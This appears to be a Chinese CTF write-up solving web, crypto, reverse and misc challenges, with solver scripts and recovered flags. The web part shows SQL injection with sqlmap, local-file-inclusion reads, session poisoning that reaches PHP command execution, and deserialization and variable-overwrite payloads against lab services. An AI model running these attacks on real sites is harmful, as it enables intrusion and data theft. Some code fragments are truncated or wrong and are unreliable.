本文共 16980 字,大约阅读时间需要 56 分钟。
WEB
1.easy_php
$value){ #遍历一下post上来的数组 $$key = $$value; } foreach ($_POST as $key => $value){ #遍历一下get上来的数组$$key = $value; } if ($_POST["flag"]!==$flag){ #如果post上来的变量跟flag.php里面的变量不一样,就diedie($_aaa); } else { echo "This is your flag : ".$flag."\n"; die($_bbb); } ?>
分析代码的过程已经在上面了,总而言之就是要post一个flag,如果跟原来的flag一样,就输出。
参考链接:https://www.freebuf.com/column/150731.html 这里利用了变量覆盖漏洞,利用第一个foreach先将$flag
的值赋给$_bbb
,然后利用die($_bbb)
将原本的flag值打印出来。 构造payload: 2.Easysql
没啥好讲的,sqlmap一把嗦。 先用BP抓包,保存为2.txtpython2 sqlmap.py -r 2.txt --dbs --thread 5
跑了一遍,先跑了sys,发现不是这个数据库,是test数据库: python2 sqlmap.py -r 2.txt -D test --tables --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag --columns --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag -C flag --dump --thread 5
3.lfi2rce
打开链接,提示: 提示了user.php,phpinfo.php.分别访问一下,发现phpinfo.php可以访问,并且给了php的一系列信息。 在index.php上,有一个文件包含漏洞include($_POST['file']);
,上传一个file变量,就可以获得想要文件的源码。利用方法为: file=php://filter/read=convert.base64-encode/resource=user.php
PD9waHANCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgZWNobyAkX0NPT0tJRVsndXNlciddOw0KICAgICRfU0VTU0lPTlsnbmFtZSddID0gJF9DT09LSUVbJ3VzZXInXTsNCg==
base64解码一下,得到: 这里又存在一个cookie文件包含漏洞。先分析一下这个代码:
echo $_COOKIE['user'];
这里需要我们上传一个参数,为user,并且利用cookie传值的方式传输。 $_SESSION['name'] = $_COOKIE['user'];
这里将cookie传入的值赋给session。
/var/lib/php/sessions
这个即为存放路径,存放格式为sess_
+cookie值。 cookie值的查看方法在: 4stodq9feohijqk3jb9dlshjg4
这个即为cookie。 那么cookie存放的绝对路径为:/var/lib/php/sessions/sess_4stodq9feohijqk3jb9dlshjg4
我们再利用index.php的文件包含漏洞包涵一下cookie: bmFtZXxzOjU6ImFkbWluIjs=
==>name|s:5:"admin";
将获得的数据base64解码以后,我们发现了我们上传了cookie。从而我们可以利用这个漏洞,去执行php的命令: 构造恶意用户名: <?php system("ls"); ?>
bmFtZXxzOjE4OiI8P3BocCBzeXN0ZW0oImxzIikiOw==
==>name|s:18:"<?php system("ls")";
这里发现base64解码的结果跟我们上传的参数不一样,应该是被过滤了。想办法绕过:url编码绕过。 查看源码,发现我们已经上传成功了: 再利用漏洞包含以下cookie: bmFtZXxzOjIyOiI8P3BocCBzeXN0ZW0oImxzIik7ID8+Ijs=
==>name|s:22:"<?php system("ls"); ?>";
为什么还是现实不出来呢,我也不知道为什么。经历了一下午的纠结之后,无意中想到去掉base64会怎么样,于是: file=php://filter/read=convert/resource=/var/lib/php/sessions/sess_28sfnijqudr01hk8smaqkpblq3
flag{36ab1c89-82fc-4ad6-a459-8af09703d2e7}
4.Babyweb
源码如下:filename); } } function check($s) { //这个函数的作用,是规定我们输入的字符的ascii值必须在32-125之间(也就是不能输入%00) for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; } if(isset($_GET{'exp'})) { $exp = (string)$_GET['exp']; if(check($exp)) { $obj = unserialize($exp); echo $obj; } } highlight_file(__FILE__);
其实很简单,就是一个php反序列化漏洞。需要注意的就是:这里的filename是private属性。
private定义的变量,在序列化之后会生成两个空字节,一般来说空字节用%00
表示,但是由于check()函数不允许%00
的输入,所以必须用\00
代替,我不知道这一点,所以就崩了。 php脚本如下: 这里的<0x00>就是空字节,如果你直接复制,粘贴的时候在这里就停下了。除此之外,需要将小写的
s
改为大写(大佬说是php版本的特性) 果然改了以后上传就没毛病,我太菜了。 Crypto
1.hex
base64解码一下,然后放winhex就出来了。 得到666c61677b35306338383535372d653165632d346131302d623439652d3034616130383764303837327d
2.xor
源码如下:key="hello"flag="*****************************************"def pad(x,y): y=y + (len(x) - len(y)) * chr(len(x) - len(y)) return ydef xor(x1,x2): c='' for i in range(len(x1)): c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1])) return cmsg=xor(pad(flag,key),flag)msg=msg.encode()#msg=b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
理一下思路:
pad函数在flag、key的位数确定的情况下,就是一个定值。 xor函数是将x1,x2每一位进行异或。 异或的逆操作就是异或,先执行pad生成一个数(字符)即为M,M跟flag异或生成msg,我们要得到flag。只需要msg跟M异或即可。 M在flag位数确定,以及key确定的情况下为定值,所以此题得解。 脚本如下:key="hello"flag="*****************************************"def pad(x,y): y=y + (len(x) - len(y)) * chr(len(x) - len(y)) return ydef xor(x1,x2): c='' for i in range(len(x1)): c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1])) return c msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'msg = msg.decode()print(xor(pad(flag,key), msg))
flag{a39c9cc-8157-11ea-bc55-0242ac130003}
reverse
1.Signin
ida反编译一下,shift+F12直接看到flag。2.放linux下upx解压一下,然后ida反编译即可。
3.RePY
脚本如下:enc = [ 34, 44, 39, 33, 61, 34, 115, 114, 117, 118, 116, 119, 120, 107, 35, 36, 36, 119, 107, 116, 127, 116, 37, 107, 127, 37, 37, 120, 107, 119, 127, 117, 116, 36, 119, 115, 38, 37, 36, 119, 119, 59]for i in enc: print(chr(i - 1 ^ 71),end='')#flag{f5632410-edd1-494c-9cc0-1934d15bcd11}
4.Jvav
用jadx反编译得到源码package defpackage;import java.util.Scanner;/* renamed from: Main */public class Main { public static void main(String[] args) { char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'}; String str = new String(); System.out.print("Please input the flag: "); str = new Scanner(System.in).nextLine(); if (str.length() != 42) { System.out.println("Wrong!"); return; } for (int i = 0; i < 42; i++) { if ((((str.charAt(i) << 3) + 1) >> 1) != enc[i]) { System.out.println("Wrong!"); return; } } System.out.println("Right!"); }}
重点是最后一个for循环,先将flag左移3位,+1后右移一位,具体啥是移位不懂,在java下逆回来就行。
java脚本:public class a1 { public static void main(String[] args) { char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'}; for (int i = 0; i < 42; i++) { System.out.print(((enc[i] << 1) - 1) >> 3); System.out.print(','); } System.out.println("Right!"); }}
得到一串数字:
101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124
估计这个是ascii码,然后用python进行转换: list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]for i in list: print(chr(i,end='')
但是结果不对:
ek`fz32``d0b7,76/b,38c/,7847,42c0/5787737| 代码改一下,改成i+1就对了:list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]for i in list: print(chr(i,end='')
flag{43aae1c8-870c-49d0-8958-53d106898848}
5.Sharpener
// test.Program// Token: 0x06000002 RID: 2 RVA: 0x000020D0 File Offset: 0x000002D0private static void Main(string[] args){ string[] enc = new string[] { "61894b21be75260c4964065b1eecec4d", "3cd02adb6df3f967c3acda1705bb86f1", "5c04925674920eb58467fb52ce4ef728", "ffbb466329361588defb5e30e5df168f", "448804aefe27492b9c183351328e7500", "598f5f04d65b4e0e35515b367763fee6", "d4398f22c157274df2d4643884db6a56", "37afcb75609159217c5548ed91c0ba1b", "28cb510090e7e926daa92745a8b02362", "49f01756d2edd088b64afd670400f4ac", "9f396fe44e7c05c16873b05ec425cbad", "958be1aac9d0641822a4dbaa3ad9010f", "82c89ed04868c75db962bb3bbe2d4b4c", "36f88e7b053afdaff9f9d792d142a406" }; Console.Write("Please input the flag: "); string userInput = Console.ReadLine(); int x = 0; int ul = 0; string tmp = ""; if (userInput.Length != 42) { Console.WriteLine("That Wrong!"); return; } for (int i = 0; i < userInput.Length; i++) { tmp += userInput[i].ToString(); x++; if (x % 3 == 0) { if (!enc[ul].Equals(Program.GenerateMD5(tmp))) { Console.WriteLine("That Wrong!"); return; } x = 0; tmp = ""; ul++; } } Console.WriteLine("Right!");}
把这几个md5值破解拼起来就是一个flag
flag{b66931c0-ec9f-4d1e-bcff-5673ce3d505b}6.Bytecoding
这个题目有点意思,拿到的是一个文本文档。内容如下:3 0 LOAD_CO 56 LOAD_CONST 12 (44) 58 LOAD_CONST 1 (101) 60 LOAD_CONST 14 (48) 62 LOAD_CONST 15 (53) 64 LOAD_CONST 7 (98) 66 LOAD_CONST 9 (51) 68 LOAD_CONST 11 (56) 70 LOAD_CONST 18 (99) 72 LOAD_CONST 1 (101) 74 LOAD_CONST 15 (53) 76 LOAD_CONST 7 (98) 78 LOAD_CONST 7 (98) 80 LOAD_CONST 7 (98) 82 LOAD_CONST 19 (124) 84 BUILD_LIST 42 86 STORE_FAST 0 (enckey) 4 88 LOAD_GLOBAL 0 (input) 90 LOAD_CONST 20 ('GoGoGo Input Flag: ') 92 CALL_FUNCTION 1 94 STORE_FAST 1 (inpt) 5 96 LOAD_GLOBAL 1 (len) 98 LOAD_FAST 1 (inpt) 100 CALL_FUNCTION 1 102 LOAD_CONST 21 (42) 104 COMPARE_OP 3 (!=) 106 POP_JUMP_IF_FALSE 120 6 108 LOAD_GLOBAL 2 (print) 110 LOAD_CONST 22 ('Wrong') 112 CALL_FUNCTION 1 114 POP_TOP 7 116 LOAD_CONST 0 (None) 118 RETURN_VALUE 8 >> 120 SETUP_LOOP 52 (to 174) 122 LOAD_GLOBAL 3 (range) 124 LOAD_CONST 21 (42) 126 CALL_FUNCTION 1 128 GET_ITER >> 130 FOR_ITER 40 (to 172) 132 STORE_FAST 2 (i) 9 134 LOAD_FAST 0 (enckey) 136 LOAD_FAST 2 (i) 138 BINARY_SUBSCR 140 LOAD_GLOBAL 4 (ord) 142 LOAD_FAST 1 (inpt) 144 LOAD_FAST 2 (i) 146 BINARY_SUBSCR 148 CALL_FUNCTION 1 150 LOAD_CONST 23 (1) 152 BINARY_SUBTRACT 154 COMPARE_OP 3 (!=) 156 POP_JUMP_IF_FALSE 130 10 158 LOAD_GLOBAL 2 (print) 160 LOAD_CONST 22 ('Wrong') 162 CALL_FUNCTION 1 164 POP_TOP 11 166 LOAD_CONST 0 (None) 168 RETURN_VALUE 170 JUMP_ABSOLUTE 130 >> 172 POP_BLOCK 12 >> 174 LOAD_GLOBAL 2 (print) 176 LOAD_CONST 24 ('Right') 178 CALL_FUNCTION 1 180 POP_TOP 182 LOAD_CONST 0 (None) 184 RETURN_VALUE
本来以为这玩意是汇编,然鹅这个是python字节码。
看了一下,勉强看懂了一点。0 LOAD_CO 56 LOAD_CONST 12 (44) 58 LOAD_CONST 1 (101) 60 LOAD_CONST 14 (48) 62 LOAD_CONST 15 (53) 64 LOAD_CONST 7 (98) 66 LOAD_CONST 9 (51) 68 LOAD_CONST 11 (56) 70 LOAD_CONST 18 (99) 72 LOAD_CONST 1 (101) 74 LOAD_CONST 15 (53) 76 LOAD_CONST 7 (98) 78 LOAD_CONST 7 (98) 80 LOAD_CONST 7 (98) 82 LOAD_CONST 19 (124) 84 BUILD_LIST 42 86 STORE_FAST 0 (enckey)
第一块,应该是一个数组(列表),里面装了['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124']
这几个数据。
88 LOAD_GLOBAL 0 (input)90 LOAD_CONST 20 ('GoGoGo Input Flag: ') inpt=input("GoGoGo Input Flag:")92 CALL_FUNCTION 194 STORE_FAST 1 (inpt)
第二块反编译过来应该就是一句代码。inpt=input("GoGoGo Input Flag:")
96 LOAD_GLOBAL 1 (len)98 LOAD_FAST 1 (inpt)100 CALL_FUNCTION 1102 LOAD_CONST 21 (42)104 COMPARE_OP 3 (!=)106 POP_JUMP_IF_FALSE 120 108 LOAD_GLOBAL 2 (print)110 LOAD_CONST 22 ('Wrong')112 CALL_FUNCTION 1114 POP_TOP
第三块、第四块大概就是
if len(inpt) != 42:print("wrong")
之后我就看不大懂了,大概就是inpt
跟enckey
进行什么计算,满足什么条件才能输出right
。
f
的ascii码是102
,enckey
的第一个值是101,看看逐个+1以后,会出现什么结果。 脚本附上: list=['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124']for i in list: print(chr(int(i)+1),end='')
flag{2c0af459-7ca1-4a46-b817-f16c49df6ccc}
Misc
1.签到题 关注公众号,回复zjnuctf拿flag2.真·签到
下载得到一个word,打开隐藏文字即可得到flag。3.你知道汉信码吗
网上找到四个角拼接得到图4.Keyboard
参考: https://www.cnblogs.com/hackxf/p/10670844.html https://blog.csdn.net/qq_36609913/article/details/78578406现在linux下执行以下语句:
tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt
得到一堆数字: 一行有16个数字,两个数字为1位,也就是8位。第3位上的数字,就是我们敲击键盘时候所对应的字母。 对照表如下: normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"","29":" ","2a":" ", "2b":"\t","2c":"","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":" ","33":";","34":"'","35":" ","36":",","37":".","38":"/","39":" ","3a":" ","3b":" ", "3c":" ","3d":" ","3e":" ","3f":" ","40":" ","41":" ","42":" ","43":" ","44":" ","45":" "}shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":" ","29":" ","2a":" ", "2b":"\t","2c":"","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":" ","33":"\"","34":":","35":" ","36":"<","37":">","38":"?","39":" ","3a":" ","3b":" ", "3c":" ","3d":" ","3e":" ","3f":" ","40":" ","41":" ","42":" ","43":" ","44":" ","45":" "}
关注完第位以后,关注第一位,有时候是0,有时候是2,盲猜第一位是2的时候为按住shift键。对了以下,刚好前面几位是flag{
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"","29":" ","2a":" ", "2b":"\t","2c":"","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":" ","33":";","34":"'","35":" ","36":",","37":".","38":"/","39":" ","3a":" ","3b":" ", "3c":" ","3d":" ","3e":" ","3f":" ","40":" ","41":" ","42":" ","43":" ","44":" ","45":" "}shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":" ","29":" ","2a":" ", "2b":"\t","2c":"","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":" ","33":"\"","34":":","35":" ","36":"<","37":">","38":"?","39":" ","3a":" ","3b":" ", "3c":" ","3d":" ","3e":" ","3f":" ","40":" ","41":" ","42":" ","43":" ","44":" ","45":" "}flag=''f = open('usbdata.txt','r')for i in range(200): l = f.readline() if l[4:6] == '00': continue elif l[0]=='2': flag += shiftKeys[l[4:6]] elif l[0]=='0': flag += normalKeys[l[4:6]] else: continue print(flag)#flag{4565fd58-c9b2-4544-86f7-872e38433467}
这里因为我不知道多少行我就多跑了几次,python会执行到有错误的地方自动停止。
5.有趣的Minecraft
把图片用winhex打开,找到最后有一行base64,解码得到cnserver.bi0x.cn
打开游戏,进去。 flag{22a61e26-6a6c-4130-a39a-15f0ce5c15fc}
6.zip
密码为UVWHZAITWAU
图片上有四种密码,第一种是MIMIMOYS
,第二种是银河字母
,第三种是小人舞旗
,第四种是鸟图腾
。 第一种和第四种是啥我不知道,但是不妨碍我爆破。 本来按照表对出来,是HZAIYQ
中间的部分字母然后前三位,后两位就盲猜,爆破就行。 生成字典的脚本附上: list='HZAITQ'all='ABCDEFGHIJKLMNOPQRSTUVWXYZ'print(len(all))f=open("pass.txt","a")for i in all: for j in all: for k in all: for l in all: for m in all: for n in all: flag=i+j+k+list+l+m f.write(flag+"\n")f.close()
跑了挺久的,但是不太对,我仔细核对了一遍,还是错。
那应该是已知的六位中出了错。先猜只有一位错了,试了六次,还费了挺久的时间,终于发现一直的六位,最后一位出错,是W
。orz 然后,打开压缩包,就得到了flag。 7.Interesting video
flag:000{w3lc0me_1337_players_and_good_luck_with_the_game}
这里是摩斯密码,密码为.-/-./-..
,翻译过来是and
这里是旗语
,翻译过来是the
。 linux下命令行执行一下,得到game
综上:000{w3lc0me_1337_players_and_good_luck_with_the_game}